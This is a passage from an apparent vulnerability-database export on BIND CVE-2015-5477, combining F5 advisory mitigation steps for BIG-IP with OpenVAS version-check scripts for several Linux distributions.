the configuration by typing the following command: \n\nsave sys config\n\n**_Disabling the Use BIND Server on BIG-IP option on the DNS profile_**\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\nBIG-IP GTM/Link Controller\n\n**_Verifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)_**\n\nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\n_Choosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)_\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n\nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. Click **Update**.\n\n * [K14510: Overview of BIG-IP DNS request processing](<https://support.f5.com/csp/article/K14510>)\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 13.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2017-03-31T22:32:00", "published": "2015-07-28T22:18:00", "href": "https://support.f5.com/csp/article/K16909", "id": "F5:K16909", "type": "f5", "title": "BIND vulnerability CVE-2015-5477", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-26T17:23:00", "bulletinFamily": "software", "description": "**1**These versions are vulnerable if a self IP address or management IP address is configured to allow inbound connections on port 53. \n\n**2**These versions are vulnerable if a DNS profile is configured with the** Use BIND Server on BIG-IP **option (enabled by default). \n\n**3**These versions are vulnerable if configured with a pool that uses the **Return to DNS** load balancing method or when the pool's** Alternate** and **Fallback** load balancing methods are set to **None** and all pools associated with the wide IP are unavailable.\n\n4 Although BIG-IQ/Enterprise Manager contains the vulnerable code, BIG-IQ/Enterprise Manager systems do not use the vulnerable code in a way that exposes the vulnerability.\n\nVulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nF5 responds to vulnerabilities in accordance with the **Severity** values published in the previous table. The** Severity** values and other security vulnerability parameters are defined in SOL4602: Overview of the F5 security vulnerability response policy.\n\n**BIG-IP**\n\nTo mitigate this vulnerability, you can use the DNS Caching and DNS Express features instead of BIND. In addition, to mitigate the issue on the management IP address, restrict access to that IP address to trusted hosts only.\n\nTo mitigate the issue on the self IP address, do not allow port 53 on the self IP address. If your self IP address is configured to use the default allow, you can remove that port from the list of the default allowed services.\n\n**_Ensuring that TCP/UDP port 53 is not allowed as a default service (allow-service default)_**\n\n 1. Log in to the Traffic Management Shell (**tmsh**) by typing the following command: \n\ntmsh\n\n 2. List the default services allowed by the **allow-service default **setting, by typing the following command: \n\nlist net self-allow\n\nOutput appears similar to the following example:\n\nnet self-allow { \ndefaults { \nospf:any \ntcp:domain \ntcp:f5-iquery \ntcp:https \ntcp:snmp \ntcp:ssh \nudp:520 \nudp:cap \nudp:domain \nudp:f5-iquery \nudp:snmp \n} \n}\n\n 3. If TCP port 53 (tcp:53 or tcp:domain) or UDP port 53 (udp:53 or udp:domain) are listed as a default allowed port, you should delete the entries by typing the following command: \n\nmodify net self-allow defaults delete { tcp:domain udp:domain }\n\n 4. Save the configuration by typing the following command: \n\nsave sys config\n\n**_Disabling the Use BIND Server on BIG-IP option on the DNS profile_**\n\nTo mitigate the issue on the DNS profile, you can disable the **Use BIND Server on BIG-IP** option by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** Delivery** > **Profiles **> **DNS** or **Local Traffic** >** Profiles** >** Services** > **DNS.**\n 3. Select the applicable DNS profile.\n 4. From the **Use BIND Server on BIG-IP** option, select **Disabled.**\n 5. Click **Finished**.\n**Important:** Disabling the BIND server can impact DNS configurations that use BIND as a fallback method (return to DNS) for resolution.\n\n**BIG-IP GTM/Link Controller**\n\n_Verifying whether you have configured any listener addresses to share a self IP (BIG-IP GTM/Link Controller)_ \n \nListener addresses that share a self IP address will expose the system to this vulnerability. To verify whether you have configured a listener address to share a self IP, run the following commands:\n\n * tmsh list /net self address\n * tmsh list /gtm listener address\n\nIf you have configured a listener address to share a self IP, you should reconfigure the address to use a unique IP address.\n\n_Choosing a load balancing method other than Return to DNS for the GTM pool (BIG-IP GTM)_\n\n**Important**: If DNS Express is not configured, BIG-IP GTM or Link Controller systems will respond to **A**, **AAAA**, and **CNAME** type DNS record queries only. Queries for other types of records, such as **NS** or **MX**, will fail. \n \nTo mitigate the issue on the GTM pool, you can use a load balancing method other than **Return to DNS** by performing the following procedure:\n\n 1. Log in to the Configuration utility.\n 2. Navigate to **DNS **>** GSLB **>** Pools.**\n 3. From the **Pool List **menu, select the applicable name.\n 4. Click the **Members** tab.\n 5. Choose a load balancing method other than **Return to DNS**.\n 6. Click **Update**.\n\nSupplemental Information\n\n * SOL14510: Overview of BIG-IP DNS request processing\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "modified": "2016-04-29T00:00:00", "published": "2015-07-28T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html", "id": "SOL16909", "title": "SOL16909 - BIND vulnerability CVE-2015-5477", "type": "f5", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-04-07T18:46:22", "bulletinFamily": "scanner", "description": "The remote host is missing a security patch.", "modified": "2020-04-03T00:00:00", "published": "2015-09-18T00:00:00", "id": "OPENVAS:1361412562310105366", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310105366", "title": "F5 BIG-IP - SOL16909 - BIND vulnerability CVE-2015-5477", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# F5 BIG-IP - SOL16909 - BIND vulnerability CVE-2015-5477\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105366\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - SOL16909 - BIND vulnerability CVE-2015-5477\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/16000/900/sol16909.html?sr=48315759\");\n\n script_tag(name:\"impact\", value:\"A remote attacker may be able to cause a denial-of-service (DoS) attack on the BIG-IP system's local instance of BIND by using a specially crafted DNS request in configurations that expose BIND to requests from untrusted users.Note: If the BIND daemon stops responding, services that do not rely on the use of local instances of BIND will continue to function.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit. (CVE-2015-5477)\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing a security patch.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-09-18 15:17:44 +0200 (Fri, 18 Sep 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.6.0;11.4.0-11.5.3;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.6.0;11.3.0-11.5.3;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.6.01;11.0.0-11.5.31;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.6.0;11.0.0-11.5.3;10.1.0-10.2.4;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.6.0;11.3.0-11.5.3;',\n 'unaffected', '12.0.0;11.6.0_HF6;11.5.4;11.5.3_HF2;11.4.1_HF9;' );\n\ncheck_f5['PSM'] = make_array( 'affected', '11.0.0-11.4.1;10.1.0-10.2.4;',\n 'unaffected', '11.4.1_HF9;11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['WAM'] = make_array( 'affected', '11.0.0-11.3.0;10.1.0-10.2.4;',\n 'unaffected', '11.2.1_HF15;10.2.4_HF12;' );\n\ncheck_f5['WOM'] = make_array( 'affected', '11.0.0-11.3.0;10.1.0-10.2.4;',\n 'unaffected', '11.2.1_HF15;10.2.4_HF12;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:56", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-08-01T00:00:00", "id": "OPENVAS:1361412562310869831", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869831", "title": "Fedora Update for bind99 FEDORA-2015-12316", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bind99 FEDORA-2015-12316\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869831\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-01 06:54:47 +0200 (Sat, 01 Aug 2015)\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for bind99 FEDORA-2015-12316\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'bind99'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"bind99 on Fedora 22\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-12316\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-August/163015.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC22\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC22\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind99\", rpm:\"bind99~9.9.7~6.P2.fc22\", rls:\"FC22\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:22", "bulletinFamily": "scanner", "description": "Check the version of bind", "modified": "2019-03-08T00:00:00", "published": "2015-08-10T00:00:00", "id": "OPENVAS:1361412562310882235", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882235", "title": "CentOS Update for bind CESA-2015:1514 centos5", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for bind CESA-2015:1514 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882235\");\n script_version(\"$Revision: 14058 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-08 14:25:52 +0100 (Fri, 08 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-08-10 12:58:28 +0530 (Mon, 10 Aug 2015)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for bind CESA-2015:1514 centos5\");\n script_tag(name:\"summary\", value:\"Check the version of bind\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named) a resolver\nlibrary (routines for applications to use when interfacing with DNS) and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"bind on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"CESA\", value:\"2015:1514\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2015-July/021270.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:08", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2015-1514", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123049", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123049", "title": "Oracle Linux Local Check: ELSA-2015-1514", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-1514.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123049\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 13:58:42 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-1514\");\n script_tag(name:\"insight\", value:\"ELSA-2015-1514 - bind security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-1514\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-1514.html\");\n script_cve_id(\"CVE-2015-5477\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"bind\", rpm:\"bind~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-chroot\", rpm:\"bind-chroot~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-devel\", rpm:\"bind-devel~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libbind-devel\", rpm:\"bind-libbind-devel~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-libs\", rpm:\"bind-libs~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-sdb\", rpm:\"bind-sdb~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"bind-utils\", rpm:\"bind-utils~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"caching-nameserver\", rpm:\"caching-nameserver~9.3.6~25.P1.el5_11.3\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:16", "bulletinFamily": "scanner", "description": "Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.", "modified": "2019-03-18T00:00:00", "published": "2015-07-28T00:00:00", "id": "OPENVAS:1361412562310703319", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703319", "title": "Debian Security Advisory DSA 3319-1 (bind9 - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3319.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Auto-generated from advisory DSA 3319-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703319\");\n script_version(\"$Revision: 14275 $\");\n script_cve_id(\"CVE-2015-5477\");\n script_name(\"Debian Security Advisory DSA 3319-1 (bind9 - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-07-28 00:00:00 +0200 (Tue, 28 Jul 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3319.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"bind9 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\");\n script_tag(name:\"summary\", value:\"Jonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"bind9\", 